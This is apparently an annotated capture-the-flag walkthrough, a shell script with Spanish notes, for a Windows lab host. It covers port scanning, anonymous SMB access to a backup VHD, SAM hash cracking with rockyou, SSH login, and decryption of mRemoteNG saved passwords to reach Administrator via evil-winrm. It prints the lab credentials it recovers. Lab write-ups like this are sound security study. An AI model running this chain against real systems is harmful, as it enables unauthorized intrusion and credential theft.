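# Recon of the lab host, then read-only access to the backup image found on
# its SMB share. The commands are the ones recorded in the notes; the only
# changes are a separate output basename for the first scan, read-only mounts,
# and creating /mnt/vhd before mounting onto it.
#
# NOTE(review): the scans target 10.129.178.250 but the SMB steps target
# 10.129.1.39 — presumably the same lab machine after a reset; confirm.
# NOTE(review): the "secnotes" output basename looks carried over from other
# notes; kept as-is so existing result files still match.

# Vulnerability-script sweep over all TCP ports. -A bundles OS detection,
# version detection, script scanning and traceroute. A 10000 pkt/s floor is
# very noisy and can miss ports on a lossy link, and a 15 s script timeout may
# cut slow checks short. Written to its own basename because the next scan
# also used "-oA secnotes" and would overwrite these results.
nmap -A -p- -oA secnotes-vuln 10.129.178.250 --min-rate=10000 --script=vuln --script-timeout=15 -v

# Baseline: default scripts, service versions and OS guess on all TCP ports.
nmap -sC -sV -O -p- -oA secnotes 10.129.178.250

# Full-range UDP scan; expect a long run time.
nmap -sU -O -p- -oA secnotes-udp 10.129.178.250

# Web server checks against port 80.
nikto -h 10.129.178.250:80

# SMB host information, then the actual finding: the Backups share opens
# with -N (no password). A share holding Windows image backups should not be
# readable without authentication.
crackmapexec smb 10.129.1.39
smbclient //10.129.1.39/Backups -N

# Mount the share read-only so nothing on the backup server can be modified.
# mount needs root like the other privileged steps; -p keeps a re-run from
# failing when the mountpoint already exists.
sudo mkdir -p /mnt/smb
sudo mount -t cifs -o ro "//10.129.1.39/Backups" /mnt/smb
cd /mnt/smb
tree

# Reload the network-block-device module and confirm the /dev/nbd* nodes exist.
# rmmod reports an error if the module was not loaded; that is harmless here.
sudo rmmod nbd
sudo modprobe nbd
ls /dev

# Attach the VHD from the backup set as /dev/nbd0; -r exports it read-only.
sudo qemu-nbd -r -c /dev/nbd0 "/mnt/smb/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd"

# The notes ran "sudo mount /mnt/vhd" before the directory existed and without
# naming a device, which cannot succeed; that step is dropped. Create the
# mountpoint first, then mount the first partition read-only to match the
# read-only export above.
sudo mkdir -p /mnt/vhd
sudo mount -o ro /dev/nbd0p1 /mnt/vhd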
No encontramos user.txt en la imagen montada.
Nos dirigimos al directorio config.
Tratamos de hacer una copia del SAM.
# Check whether the NT hashes (presumably taken from the SAM copy in the
# backup image) are accepted by the live host over SMB and WinRM. -H supplies
# an NT hash in place of a password: NTLM treats the hash as the credential,
# which is why a readable backup of the SAM hive is as serious as a leaked
# password list.
#
# Both hash values are truncated in the notes and are reproduced as written.
# NOTE(review): the 31d6c… prefix matches the well-known NT hash of an empty
# password, which usually indicates a blank or disabled account — confirm.
# NOTE(review): bastion.htb must resolve locally; the notes do not show how.
bastion='bastion.htb'
l4mpje_nt='2611...'

crackmapexec smb "${bastion}" -u 'Administrator' -H '31d6c...'
crackmapexec smb "${bastion}" -u 'L4mpje' -H "${l4mpje_nt}"
crackmapexec winrm "${bastion}" -u 'L4mpje' -H "${l4mpje_nt}"
La contraseña es bureaulampje.
# Offline dictionary check of the NT hash against the rockyou list, followed
# by an SSH login as L4mpje. A password that appears in a common wordlist and
# is also valid for remote login is the weakness being demonstrated here.
# NOTE(review): "hash" is presumably a file in the current directory holding
# the NT hash; the notes do not show how it was created.
wordlist='/usr/share/wordlists/rockyou.txt'
hash_file='hash'
john --wordlist="${wordlist}" "${hash_file}" --format=NT

ssh_user='L4mpje'
ssh_host='bastion.htb'
ssh "${ssh_user}@${ssh_host}"
REM Windows commands, presumably typed inside the SSH session opened above.
REM /priv lists the privileges held by the current access token.
whoami /priv
REM /all reports the user, its SID, group memberships and privileges together.
whoami /all
Vemos que mRemoteNG está instalado.
REM PROGRA~2 is an 8.3 short name; on 64-bit Windows it normally resolves to
REM "C:\Program Files (x86)" - confirm on the host.
cd C:\PROGRA~2
REM Per-user mRemoteNG settings directory for the L4mpje account.
cd C:\Users\L4mpje\AppData\Roaming\mRemoteNG
REM confCons.xml is the mRemoteNG connections file. Saved connection passwords
REM are stored in it encrypted, but unless the user sets a custom master
REM password the key is the application default, so anyone who can read this
REM file can recover them. Saved admin credentials in a user-readable profile
REM are the finding here.
type C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml
# Fetch a third-party helper and use it to decrypt the password string copied
# from confCons.xml (the string is truncated in the notes).
# NOTE(review): this clones and runs unpinned code from a personal GitHub
# repository; read the script first and check out a reviewed commit before
# running it on an assessment workstation.
# NOTE(review): the notes omit a cd into the cloned directory; the python line
# only works if mremoteng_decrypt.py is in the current directory.
# NOTE(review): -s presumably takes the encrypted string; a secret passed on
# the command line is visible in shell history and the process list.
decrypt_repo='https://github.com/haseebT/mRemoteNG-Decrypt'
git clone "${decrypt_repo}"

encrypted_value='aEWNFVS...'
python mremoteng_decrypt.py -s "${encrypted_value}"
Conseguimos las credenciales -> Administrator:thXLHM96BeKL0ER2
# Confirm the recovered Administrator password over SMB, then open a WinRM
# session with it. The root cause is an administrator password saved in a
# lower-privileged user's mRemoteNG profile.
# NOTE(review): the password is passed on the command line, so it lands in
# shell history and the process list; treat these notes as sensitive and
# rotate the credential after the exercise.
win_host='bastion.htb'
admin_user='Administrator'
admin_pass='thXLHM96BeKL0ER2'

crackmapexec smb "${win_host}" -u "${admin_user}" -p "${admin_pass}"
evil-winrm -i "${win_host}" -u "${admin_user}" -p "${admin_pass}"